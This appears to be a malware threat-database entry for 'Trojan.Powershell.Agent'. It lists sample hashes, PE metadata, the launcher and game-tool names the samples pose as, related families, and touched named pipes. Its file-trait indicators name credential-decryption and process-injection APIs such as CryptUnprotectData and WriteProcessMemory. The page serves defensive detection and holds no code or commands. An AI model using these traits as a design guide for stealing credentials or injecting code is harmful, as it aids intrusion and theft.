Multi-License Discount Quote

Change Region

English
Threat Database Trojans Trojan.Powershell.Agent

Trojan.Powershell.Agent

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 2,276
Threat Level: 80 % (High)
Infected Computers: 703
First Seen: May 24, 2024
Last Seen: April 22, 2026
OS(es) Affected: Windows

Analysis Report

General information

Family Name: Trojan.Powershell.Agent
Signature status: No Signature

Known Samples

MD5: 08d5f2eb217462e79b6bd715106e6841
SHA1: 20c4947f3f7656db2b7c8afe296be29ea167f0c3
File Size: 1.45 MB, 1451008 bytes
MD5: 88cbcc7cceb5e27561a74ea558fe1764
SHA1: 7e7e7fb8de0c81f691290ca8a776e62582dcb148
File Size: 4.70 MB, 4699648 bytes
MD5: 41bfb061e5dddda9430f0c481c437acc
SHA1: 6f66173cc78af31e2945ab897ff46b3878a41e05
SHA256: 17DBEAA8C773B672DBCC60332CBED5A98E94B8156026B2001B108AFFFE30D602
File Size: 3.43 MB, 3429888 bytes
MD5: a7e2cf6fc18f25427084ee498d068483
SHA1: 8cc6d749f60c02de6d61744d3b15c8bddc404767
SHA256: FCE2E80D1FEFD53EFB1CBAB82DE9EF6E843C9BEA0074B70C83DA112FC36E8A4A
File Size: 6.98 MB, 6981632 bytes
MD5: 49dd7ae749a6238a213705cbe0a5867c
SHA1: 36f6413bd3ca800dfc66725d52421babc85b9619
SHA256: EC90F8AA83D87FC9F3FC3B991025EDB57BF2C1AAE471487D99A73BC1294813AF
File Size: 793.09 KB, 793088 bytes
Show More
MD5: daa8a39a60e9b3d0247b656c66eb9401
SHA1: 73637ac26e1840f21877a7dd33782ec7e69bfb14
SHA256: 55BE3E6CDAD379F935AEDEB24D20EB9F418C17D1E9739F872A347ECB9CF78E61
File Size: 315.90 KB, 315904 bytes
MD5: 3e72a2924cf6f11ddadc98d96d091bf1
SHA1: 0bf30a10a614207d27df8c8fc8e7b50853a52cc4
SHA256: 93A7F2326FBC959458E14647D0D752D1AB7D89C73060B956CD988F321F0DDC26
File Size: 793.09 KB, 793088 bytes
MD5: 0454c7e4196d9934192c59b55f38c0e2
SHA1: 41c1d68f0782a24e0ec47b2b203d7920bc5267da
SHA256: 3C41E8FDD8AFDAB3277668183CFF32B827DB9CDC8D79E4950322BA19C2BF5120
File Size: 1.43 MB, 1428480 bytes
MD5: 1f64428c3fe460477a4cb6a16ce87bd8
SHA1: 25df9100dccea20b7e9df01d8985dd359f11c081
SHA256: 6AB1EE6C9AC516605A541B017E57A350FF667724598B5CFEE3FDA9B2427D0AC6
File Size: 3.82 MB, 3824128 bytes
MD5: 5c7b5e617bb3fa618a852357d539d0b8
SHA1: 00f1b46df4148957f276b77b2270888c8b7a73ca
SHA256: 7595BAADD0ABDE4C20830484D87D14D1FC449230156506E28B1945DD89D8D42D
File Size: 2.52 MB, 2522624 bytes
MD5: 832008da7d08b720da63728e1cd7b807
SHA1: 819ce40e357612584bd690fc220921b9d4a8431a
SHA256: B968F3C7FD70D855EF3C7E3E4B285F6CC6D1DE18E8F73BE97D19512E30C6BB71
File Size: 2.93 MB, 2931200 bytes
MD5: 48a2936aad77328de795bb2604561f33
SHA1: 0b96826eb192ae3f6e17e84c283abf8521267837
SHA256: A7D8CB503FE3EE74D2E3DC5CB2608755F2D371E6CDF28254BD083313E3A3148A
File Size: 1.29 MB, 1292800 bytes
MD5: a104497a8a60a6eaada2ed5cfacf0a61
SHA1: 7107fd33026804fb7da9494d952a46d036f49200
SHA256: 07A9542225DBCEA7747FAE19E6FB61D6D66BD13F5A8554DB5DA2F32D4FA6CB73
File Size: 828.93 KB, 828928 bytes
MD5: ebc5d20c8580127e6b8f35f733224cb4
SHA1: b35794db405d102bc4f07d7df22b923d3717ffa7
SHA256: 0111FFB0DAB4BDEF8C8788E4CE6AD4FC071B9F7B1F3AFFB7EAD8D5DF9582F34F
File Size: 102.91 KB, 102912 bytes
MD5: 5bdca149cc76d37f7601bd59bd5a0698
SHA1: 2e56f4d8092bf9b829cd1b563f04cd55e2eb599a
SHA256: B0F2288D042583D0159AD214B37539CD0016F0A4973C3F119B8531C73D5B9D30
File Size: 890.88 KB, 890880 bytes
MD5: 78bf2e1d6172c05203a44dc1ee91a4cf
SHA1: 0e199c55c8195b8b3536317853da28ce2dbbb666
SHA256: 8C1254B01C0FCF31315D6A196BCF3AE56CA2BEB53B23ABEA39B9C0F4281D6E13
File Size: 103.42 KB, 103424 bytes
MD5: fd4a6c90472422c282333dce2acdda2c
SHA1: 28af085b96c937048d463741bc75a38dd37fdfc3
SHA256: 1CE64B0EF7130995561CCE7D149D6DE4611688EDC19016919252560FBCF046B1
File Size: 105.47 KB, 105472 bytes
MD5: 4e1de47f1ec3764fd140b81d7335fa87
SHA1: 7ce1d3e581ff3fe908b8ea9a2e5a9ef6d9781378
SHA256: 6547810C3106FD8F9F77B1E02FE3F90FF4C5A3148ED594143142E2944CDDD1CF
File Size: 107.01 KB, 107008 bytes
MD5: 09f99eedb2f4a357328769bfb7eb831a
SHA1: ada3218132154506f9959f6667800eb3e72ffcdb
SHA256: B982E7778974E6B663559A7B4B0DD7A932386D99DD0A700E6BF53E47402F955D
File Size: 14.85 KB, 14848 bytes
MD5: 0fd7a56466d976e5ad99f72fde2df901
SHA1: 075ce8c6a8190bfa4f9facbb57cdc728e7ba52ea
SHA256: 327CCB68C662D065BBC780E6C3A587EB396B2534DB1963C266A2DA5685D6B594
File Size: 828.93 KB, 828928 bytes
MD5: 44b147bdcee1b318cc600da432b1d3b7
SHA1: 872285bad4e55235da29176c198c9d8ceef642d6
SHA256: C659D53996E5942B7C4B4C8EB1C3C428694EF419D6F4E0C8BDBC48F0F42D2650
File Size: 954.37 KB, 954368 bytes
MD5: 239b0dc9d9f719f22d1f10b7732e1517
SHA1: 6ea26f667239fc5b8f97c6f9fc57f20ca9a2797b
SHA256: D686F5FEDD912CE975295D1BC4C8A8A5318BCF6DEFA1F0E47BB360FA4A6E4FEC
File Size: 2.70 MB, 2695680 bytes
MD5: 948391bb55536c46a1631eecd85a6ad3
SHA1: b294096aa12003b9a4c02a02c27250eb5b7a3193
SHA256: 1A02F8A0A30E9304317C9112223F10D846387F58A7F2ACA233372C26F6360B1C
File Size: 3.97 MB, 3971584 bytes
MD5: 035b01404ba7b407ff9f355899e3d3ab
SHA1: 614fb106c2c82033454af29c0eb6f2a0091f49fa
SHA256: 008255BAD776F0A1EA23D62DB3492D12271F6AFC79513633C1871A7F17B9675D
File Size: 5.67 MB, 5672448 bytes
MD5: 0671e7721d6fcc509b22d45d8c6fb9d1
SHA1: 607736f2744bc95f8939cc63c5fd6952a9a8c190
SHA256: 102CFE7E470D3C7F9AA27D03E2F4D8BC2FE91E1BA8CAAA880385364501BC6D4A
File Size: 7.27 MB, 7272448 bytes
MD5: 45acbc93ac5ab112dac8bbb47c36ae3f
SHA1: b93dc317de9e6f50f25d83df63c6d107591118d1
SHA256: F4844BD993221CDD68170BB2BA74F6C0CD4B235E9803D1BF5E4CD00B6772D42C
File Size: 793.09 KB, 793088 bytes
MD5: a01ccc8635289b0ba0e7e14564c89b42
SHA1: 8db8a7f12b0812611769554df5f2815dab492237
SHA256: 41F6E49552441DC6894BA0171FACD9E428C0F34B6AE3730EA5662A0DA6FE15E2
File Size: 451.58 KB, 451584 bytes
MD5: b7db4bcee6431350043c52aceb03b337
SHA1: e273ced962a291ea12ff6bc4fa78342f759eab6d
SHA256: 61EC6D5AB90328AD26044A8CEBCD1545D891E986DF2D2E34BB9DCE1716DDF0F5
File Size: 4.99 MB, 4989440 bytes
MD5: f65a8deaa4abe93369e65badab82901d
SHA1: 2bc73a4ae0eb38795c8413f5d8c176fb44d6a89b
SHA256: 4195931149D72AFBD83F4C358EAD64780F56B4D58D58249E49BB99B7BC7ABAE0
File Size: 227.84 KB, 227840 bytes
MD5: 44c0b21d2a96047a251999e90e2e9169
SHA1: 96c7077d1b99dca84e7f3b5a89e58cb608153ac0
SHA256: 979E32FDFBB01D84E881B1694C74C7D7D3CC272D7D1FBDF26A0E89DDB48331AD
File Size: 843.78 KB, 843776 bytes
MD5: 44687b5cc789a7f9c66a49fe87b3f4fe
SHA1: dd13b1b470d80d06a516e12106bfa93623d20181
SHA256: 1D68A55EC21B02E157CDF0F43FB8B2B2E519272B9039551DC7415370D3F01E34
File Size: 1.25 MB, 1249280 bytes
MD5: e20fde1ce1a5f6929978ce2d8a399ed7
SHA1: 216eede3e8b0a2ec3fa32fe2ab38dabd2bd6f3f0
SHA256: 9958A6BD9B99460FFBB8F0E1E104BD71FA2FAB48BA2FDCF845AC0C0F1C592120
File Size: 1.76 MB, 1756672 bytes
MD5: 0591317b54ca96d3cc7d15e4a0ab3bd1
SHA1: 23d7ee487ac34927af9f3c7951de68ae91d64927
SHA256: 1EEEC6B4A1855AD3B95673D692CE47E6CE660019A168154D37429836E53C5EEC
File Size: 2.13 MB, 2128896 bytes
MD5: a7095142a0eeeb90ad8d28d6b421c9e3
SHA1: 14c17e5f69e6e5074c60adec8409066514a2e434
SHA256: CE73A8A3E2C87BD9BCFBB0C51C5A1F0ED68496C587A336E00EB4D2619C49E402
File Size: 921.09 KB, 921088 bytes
MD5: e657959541358a1d8b6ce4476481e8c9
SHA1: 91b2a1efb00868895c3066b4316240a124970588
SHA256: 54E0AE616663663BE19486D8FE6568555B4BD7CDED4A20901DC99FD2EE4AE9A7
File Size: 451.07 KB, 451072 bytes
MD5: 0adada6a7d10771d9a600368c161cc2b
SHA1: f0503cac501a0c3ab8a2329da66a2173903b0e65
SHA256: 991354AB43325557A64C01E33BCD27C88B840BB74372CF7BEA291D46AE35EB23
File Size: 923.65 KB, 923648 bytes
MD5: 3cdcb0696c0ab363609e5108d453eb25
SHA1: ee563284fc8728b68a73c02c0721a91766939850
SHA256: 6F91BCE3522FC9171F3058DA1FD8097AE11FF7452E6DC188D449BF225EC2B82F
File Size: 4.01 MB, 4011008 bytes
MD5: 098f49d10512c6fecc7b3a97055a1905
SHA1: 54ec8cb895d252dee5fc009c2f9f1359f64c1caf
SHA256: 1781A39F4E8A36D04A788C2900CB152127FB12C464A34267A5473A517C46B402
File Size: 3.83 MB, 3829248 bytes
MD5: bcc1ad9e951e608562da3afa2f464fef
SHA1: 7d9f33a14e185b2b13346cbe43a1fa55a8f44307
SHA256: F14E9AB8D1AE326ABC6452749CF95A1A94D1227C7FA94B86C6F41F37810DAADB
File Size: 450.56 KB, 450560 bytes
MD5: 9aa7d7a212371c1f7da623a3efe7a2f6
SHA1: 3a74578d7c8ab3ab68efdbcb8b6e5835c0d5aa57
SHA256: DE0F7DFA69510A107B4F88AD47EDFDEE1F529B26B23633E9360852FC82D4D13F
File Size: 972.29 KB, 972288 bytes
MD5: 21e73b4ce02863b18a01a79fb672ed45
SHA1: 106f9362000efd662664631657edea43c1e98fa8
SHA256: 8BC3641C5B7FAF88AF4D8F4AF60266EDF1611F04BFF281D95E64773E22B38C1A
File Size: 514.56 KB, 514560 bytes
MD5: 164373f800f4e5cb67d9507e83168e54
SHA1: 4ea241ccfcf42c0a31d7f2dbf78fc51ae8db791e
SHA256: 0CBBD57284203749C0B7894206C38819C86902F4A407DDF1207BFB6EB636A2E2
File Size: 451.58 KB, 451584 bytes
MD5: 3893c4683616d1a82252c3388ba7b205
SHA1: f2ffb6de24332aee62d7bc0cbd40655a8800ad99
SHA256: 2230CD657793871F75C6FDF3337A128227986EA8FDC1BDA0861883439866EEF3
File Size: 345.60 KB, 345600 bytes
MD5: fb61d9b203f29f63b00ede8792906e11
SHA1: d661cd9180fefffa8ab4fd42ba8695b485944458
SHA256: EADFBEAB81C8404C48FCC2A5B05649FBD6E33C99A00914D864CD79D0E726C3F5
File Size: 856.58 KB, 856576 bytes
MD5: 5d6ce9f2595d8a5d321fb5b401d0f936
SHA1: 45db803015736162ddad19e57771f63635e09e36
SHA256: 4B648EAA723D7417569995B37325BCDB562D1AEF3A226410607855AE6B2FF86F
File Size: 2.11 MB, 2109440 bytes
MD5: 7c85e29be9e1c7d6903bfaff94f0a52a
SHA1: 691394f7848c036efed74847d359ae7fd708c5a5
SHA256: 7EF83239F6D2A1A653882DE2DF0861DDAFFBC272082F580788CD6593BD6EFE14
File Size: 3.72 MB, 3721728 bytes
MD5: 4cdecd98fcbb91a34db3d65244977ac9
SHA1: 996ee23a60e2aa1f4aee4f1d3c579ee437671775
SHA256: 316DF7BA373E28A208944CCA5F6D720746F974DFE69C32004EF1156E8F3C6AA1
File Size: 894.98 KB, 894976 bytes
MD5: d6d2677050f18db484f1c88b8e49a248
SHA1: b993fa25a382cd62212ae1a5c0600a2ce3a8891e
SHA256: 80F1B0B6ACDC093B18945C1B35EE567E8C6A6BD7D33516AD681ADBBF53FEA236
File Size: 5.68 MB, 5684224 bytes
MD5: 56af620094800984379608f6841acbe6
SHA1: 2b34eb1b0c02fe6ce336d008032bfbda245cb254
SHA256: BAA60BACCF4D73529EEA445348B71A06700A18C185688207C032772B16AAF491
File Size: 2.17 MB, 2166272 bytes
MD5: 25a271010b3c9a3209759fcb803208f1
SHA1: 99dd79bafed6cbe171c289592c9227a0b471ee4a
SHA256: F67E4EA85520CF21B063960CBF3BC0593584F11B320C7595AC9DF435126E011D
File Size: 6.09 MB, 6088704 bytes
MD5: 218693cc0b9b2d35538d2a01d0127d2b
SHA1: 6ee7ddb13eb50078e89e27d8ecd3a6f03142a757
SHA256: 097A53398B9558D613E8001154D011E07356DC2EEABE05A36A5F5AFBD00D38D5
File Size: 691.20 KB, 691200 bytes
MD5: 8ef07bae63832835b61269e959049703
SHA1: 6152b7069ad74180002a5ce599f9eb957795ea2c
SHA256: 110BFC0A4BD731D287CDAB7CBC112ACAF4F2D3293520C8028C71AD31C2A9440D
File Size: 1.40 MB, 1395200 bytes
MD5: 428a6b5802387208774b56dd16cbdec7
SHA1: 16ae5231a7e9b8a1eee7f0defa65eeb9fe6dbcf3
SHA256: 5F42F32778023746A8A5A531A380532EBBF7F09413D556654BAF000EDADA4782
File Size: 88.58 KB, 88576 bytes
MD5: 787a515cc27a8901434d245e11e9fab6
SHA1: 2f65ae4188b4a6ae19e49bc4ca250a454c9263e8
SHA256: 5BAD25AD2E07C1AE0126C9A48EF6245590BA018A7E2B8BE405ECAC53CCE858C8
File Size: 4.22 MB, 4224000 bytes
MD5: 1ea670d563ea7de167ed2122fd760cf1
SHA1: d39364c53971b68e2303e0e86ff983eda1d59461
SHA256: 52251986EE69187024D877A83720A74AA331663B3AD4F4DB1F91196E1948057C
File Size: 345.60 KB, 345600 bytes
MD5: 5658132c7ff7206cae34d1d50210a3b6
SHA1: ccebd336e082e2c15eba0b7d641290e7de12d65b
SHA256: 6860ACD93755FAFDC3C595AAF93B5F39500A870E26DE55F02464824BB88FEAD4
File Size: 2.18 MB, 2176000 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have resources
  • File doesn't have security information
  • File has been packed
  • File has exports table
  • File has TLS information
  • File is .NET application
Show More
  • File is 32-bit executable
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Value
Assembly Version 1.0.0.0
Comments
  • Local AI model serving with hardware acceleration
  • System tray interface for Lemonade AI Server
Company Name
  • AMD
  • AmeerXoshnaw
  • AzyhuScripts
  • Caddev
  • CB Servers
  • Project Black Ops 4
  • Tsuda Kageyu
File Description
  • AmeerXoshnaWxSteamTool
  • AzyhuScripts Library for ZeroBot
  • CB Servers Launcher
  • Joinery Tools Center
  • lemonade-router.exe
  • Lemonade Server
  • Lux Injetor
  • MinHook - The Minimalistic API Hook Library for x64/x86
  • Shield Launcher
File Version
  • 10.2.0.0
  • 9.4.1.0
  • 2.0.4
  • 2.0.1.0
  • 1.3.3.0
  • 1.2.0.78
  • 1.1.37.02
  • 1.1.2.64
  • 1.1.0.1
  • 1.0.5.48
Show More
  • 1.0.3.43
  • 1.0.0.1
  • 1.0.0.0
Info https://cbservers.xyz/
Internal Name
  • AmeerXoshnaWxSteamTool.exe
  • JTC.dll
  • launcher
  • lemonade
  • lemonade-server
  • Lux Injetor.exe
  • MinHookD
  • Shield Launcher.exe
Legal Copyright
  • Copyright (C) 2009-2017 Tsuda Kageyu. All rights reserved.
  • Copyright (C) 2024 AMD
  • Copyright (C) 2025
  • Copyright (C) 2025 AzyhuScripts. All rights reserved.
  • Copyright (C) 2026 CB Servers. All rights reserved.
  • Copyright © 2026
  • Copyright © Caddev 2022
Legal Trademarks
  • Created By BodNJenie™
  • Tsuda Kageyu
Licence GPLv3
Original Filename
  • AzyhuScriptsLib.dll
  • cb-launcher.exe
  • JTC.dll
  • lemonade-router.exe
  • lemonade-server.exe
  • Lux Injetor.exe
  • Shield Launcher.exe
  • SteamManager.exe
Product Name
  • AmeerXoshnaWxSteamTool
  • AzyhuScripts Library
  • CB Servers Launcher
  • Joinery Tools Center
  • lemonade-router.exe
  • Lemonade Server
  • Lux Injetor
  • MinHook DLL
  • Shield Launcher
Product Version
  • 10.2.0.0
  • 9.4.1.0
  • 2.0.4
  • 2.0.1.0
  • 1.3.3.0
  • 1.2.0
  • 1.1.37.02
  • 1.1.2
  • 1.1.0.1
  • 1.0.5
Show More
  • 1.0.3
  • 1.0.0.1
  • 1.0.0.0

File Traits

  • 2+ executable sections
  • AutoHK
  • CryptUnprotectData
  • dll
  • fptable
  • GetConsoleWindow
  • HighEntropy
  • imgui
  • JMC
  • No CryptProtectData
Show More
  • No Version Info
  • ntdll
  • packed
  • Pastebin
  • VirtualQueryEx
  • WriteProcessMemory
  • x64
  • x86

Block Information

Total Blocks: 6,236
Potentially Malicious Blocks: 204
Whitelisted Blocks: 4,514
Unknown Blocks: 1,518

Visual Map

0 0 ? ? 0 0 0 0 0 0 0 ? ? 0 ? 0 ? 0 0 x ? ? ? 0 ? ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 ? ? ? x 0 ? 0 0 x ? 0 ? ? x 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 x 0 ? 0 0 ? 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 ? ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 ? ? ? 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 1 0 0 0 0 ? ? 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 ? ? ? 0 0 0 0 ? ? ? ? 0 ? ? ? 0 0 0 ? ? 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 ? ? 0 0 ? ? 0 ? ? 0 0 0 0 0 ? 0 ? ? ? 0 0 0 0 0 ? 0 0 0 0 0 0 ? 0 0 0 ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 ? ? 0 0 0 ? 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? 0 0 ? 0 0 ? 0 0 ? ? 0 0 ? 0 0 0 ? ? ? 0 0 0 ? ? 0 0 0 0 0 0 0 0 ? ? ? ? ? 0 0 ? ? ? 0 ? ? 0 0 0 0 ? 0 ? 0 0 0 0 ? ? ? ? 0 0 0 0 ? 0 0 0 ? ? 0 0 0 0 0 ? ? ? 0 ? 0 0 0 0 0 x 0 0 0 x 0 0 0 0 0 0 0 ? 0 0 0 0 ? 0 0 0 ? 0 0 0 0 0 ? 1 0 0 0 0 0 1 ? ? 0 0 ? ? ? 0 0 ? 0 0 ? 0 0 ? ? ? 0 0 ? ? ? 0 ? 0 ? ? ? 0 0 0 ? 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? ? ? 0 0 ? ? ? ? ? 0 ? ? ? ? 0 0 0 ? 0 0 0 0 0 0 0 ? ? ? ? 0 ? ? 0 0 0 0 1 0 0 ? x ? 0 ? ? 0 0 1 0 0 ? 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? 0 ? 0 0 0 0 ? 0 ? 0 ? 0 ? ? 0 0 ? 0 ? ? ? ? 0 0 0 ? ? ? ? 0 0 ? ? 0 ? ? 0 0 ? 0 0 ? 0 ? 0 ? ? ? ? 0 ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? ? ? ? ? 0 ? ? 0 0 ? ? 0 0 0 ? 0 0 ? 0 0 0 0 x 0 0 0 0 0 0 0 0 ? 0 0 0 ? ? 0 0 ? ? 0 0 ? ? ? 0 ? ? 0 0 ? ? ? 0 0 0 ? ? ? 0 ? ? 0 ? ? ? 0 ? ? 0 0 ? ? ? ? ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 ? 0 0 0 0 0 0 0 ? ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 ? ? 0 ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 ? 0 0 0 ? 0 ? 0 0 ? x ? 0 0 ? x 0 ? 0 0 0 ? 0 0 0 0 ? 0 ? ? 0 0 ? 0 ? ? 0 0 0 0 0 0 0 0 0 ? ? 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 ? 0 ? 0 0 0 0 ? ? 0 ? 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 ? ? 0 0 0 ? 1 ? ? 0 ? 0 ? 0 ? 0 0 ? 0 ? 0 ? 0 0 ? 0 ? ? ? 0 0 0 0 0 0 0 0 ? ? 0 ? ? ? 0 ? ? ? 0 ? 0 ? 0 ? ? ? 0 ? ? 0 ? 0 ? ? 0 ? ? 0 0 ? 0 ? 0 ? ? 0 0 0 0 0 ? 0 0 ? ? 0 0 0 ? 0 0 ? ? 0 0 0 0 0 0 ? ? 0 0 0 0 0 0 0 0 ? ? 0 ? 0 ? ? ? 0 ? 0 ? 0 0 ? 0 0 x ? ? 0 ? 0 ? 1 0 0 ? 0 0 0 0 1 0 ? 0 ? 0 0 0 ? ? ? ? 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 ? ? ? ? 0 ? 0 ? ? ? 0 ? ? 0 ? ? ? 1 ? 0 0 ? 0 ? 1 ? 0 ? ? ? 0 0 0 ? 0 0 ? ? 0 1 ? 1 ? 0 ? 1 0 ? 0 ? 0 0 0 ? 0 ? ? ? 0 ? 0 0 ? 0 0 0 0 0 ? 0 0 0 ? ? ? ? 0 1 ? ? ? ? 0 0 0 ? ? 0 0 0 0 0 ? 0 0 0 0 ? ? ? ? 0 0 ? ? ? ? 0 ? 0 ? 0 ? 0 0 ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 ? 0 0 ? 0 ? 0 ? 0 ? ? ? 0 0 ? 0 ? ? 0 ? ? 0 ? 0 0 ? 0 0 0 ? 0 0 0 0 0 ? ? ? 0 0 ? ? ? 0 0 0 0 ? 0 x 0 0 ? ? 0 ? ? 0 0 0 0 ? 0 0 0 0 0 ? ? 0 ? ? ? ? ? ? 0 0 ? 0 ? 1 0 0 0 ? ? ? 0 0 0 ? 0 0 0 0 0 0 ? ? ? ? 0 ? 0 0 ? ? ? 0 0 0 0 1 0 0 ? 0 0 0 0 0 0 0 ? 0 ? ? 0 ? 0 0 0 ? ? ? ? ? ? 0 0 ? ? 0 ? ? ? ? 0 0 ? ? ? 0 ? 0 ? ? ? ? ? 0 ? ? ? ? ? 0 ? 0 ? 0 0 0 0 ? ? 0 ? ? 0 0 0 ? ? ? ? ? ? ? ? ? ? ? 0 ? ? ? 0 ? 0 ? 0 0 0
... Data truncated
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Agent.DEAB
  • Agent.FYL
  • Agent.KFP
  • ClipBanker.OC
  • CobaltStrike.RG
Show More
  • CobaltStrike.SR
  • CobaltStrike.SU
  • Coinminer.LM
  • Downloader.Agent.DTB
  • Gamehack.GDDB
  • Gamehack.SBG
  • HackKMS.TC
  • Khalesi.D
  • KillWin.H
  • Kryptik.UGC
  • Lamer.CA
  • Lamer.CB
  • Lamer.E
  • PSW.Agent.KF
  • ShellcodeRunner.TWA
  • Socelars.DD
  • St0rm.A
  • Stealer.B
  • Stealer.BC
  • Stealer.BE
  • Stealer.T
  • TGBot.JA
  • Tedy.K
  • Trojan.Agent.Gen.ABX
  • Wpakill.A

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
\device\namedpipe\dav rpc service Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\pshost.134024922551853307.2624.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134076074978190894.7796.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134097517733282670.4668.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134101916156709262.5528.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134101916163151840.4244.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134132712154861456.7136.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134133916596935858.288.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
Show More
\device\namedpipe\pshost.134165533653723671.6976.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134165533660766602.4968.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134167687803066876.7204.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134167687815039093.8140.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
